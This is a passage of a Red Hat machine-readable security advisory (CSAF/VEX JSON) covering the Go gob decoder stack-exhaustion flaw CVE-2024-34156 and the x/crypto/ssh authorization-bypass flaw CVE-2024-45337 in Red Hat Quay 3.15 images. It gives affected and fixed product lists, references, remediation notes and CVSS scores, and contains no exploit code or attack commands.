"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-34156"
},
{
"category": "external",
"summary": "RHBZ#2310528",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310528"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-34156",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34156"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-34156",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34156"
},
{
"category": "external",
"summary": "https://go.dev/cl/611239",
"url": "https://go.dev/cl/611239"
},
{
"category": "external",
"summary": "https://go.dev/issue/69139",
"url": "https://go.dev/issue/69139"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk",
"url": "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2024-3106",
"url": "https://pkg.go.dev/vuln/GO-2024-3106"
}
],
"release_date": "2024-09-06T21:15:12.020000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-03T22:07:28+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6568"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "encoding/gob: golang: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion"
},
{
"cve": "CVE-2024-45337",
"cwe": {
"id": "CWE-285",
"name": "Improper Authorization"
},
"discovery_date": "2024-12-11T19:00:54.247490+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2331720"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the x/crypto/ssh go library. Applications and libraries that misuse the ServerConfig.PublicKeyCallback callback may be susceptible to an authorization bypass. For example, an attacker may send public keys A and B and authenticate with A. PublicKeyCallback would be called only twice, first with A and then with B. A vulnerable application may then make authorization decisions based on key B, for which the attacker does not control the private key. The misuse of ServerConfig.PublicKeyCallback may cause an authorization bypass.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang.org/x/crypto/ssh: Misuse of ServerConfig.PublicKeyCallback may cause authorization bypass in golang.org/x/crypto",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability is classified as important rather than critical because it does not directly enable unauthorized access but rather introduces a risk of authorization bypass if the application or library misuses the PublicKeyCallback API. The vulnerability relies on incorrect assumptions made by the application when handling the sequence or state of keys provided during SSH authentication. Properly implemented systems that use the Permissions field or avoid relying on external state remain unaffected. Additionally, the vulnerability does not allow direct exploitation to gain control over a system without the presence of insecure logic in the application\u0027s handling of authentication attempts.\n\n\nRed Hat Enterprise Linux(RHEL) 8 \u0026 9 and Red Hat Openshift marked as not affected as it was determined that the problem function `ServerConfig.PublicKeyCallback`, as noted in the CVE-2024-45337 issue, is not called by Podman, Buildah, containers-common, or the gvisor-tap-vsock projects.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
],
"known_not_affected": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-45337"
},
{
"category": "external",
"summary": "RHBZ#2331720",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2331720"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-45337",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45337"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45337",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45337"
},
{
"category": "external",
"summary": "https://github.com/golang/crypto/commit/b4f1988a35dee11ec3e05d6bf3e90b695fbd8909",
"url": "https://github.com/golang/crypto/commit/b4f1988a35dee11ec3e05d6bf3e90b695fbd8909"
},
{
"category": "external",
"summary": "https://go.dev/cl/635315",
"url": "https://go.dev/cl/635315"
},
{
"category": "external",
"summary": "https://go.dev/issue/70779",
"url": "https://go.dev/issue/70779"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/-nPEi39gI4Q/m/cGVPJCqdAQAJ",
"url": "https://groups.google.com/g/golang-announce/c/-nPEi39gI4Q/m/cGVPJCqdAQAJ"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2024-3321",
"url": "https://pkg.go.dev/vuln/GO-2024-3321"
}
],
"release_date": "2024-12-11T18:55:58.506000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-03T22:07:28+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6568"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
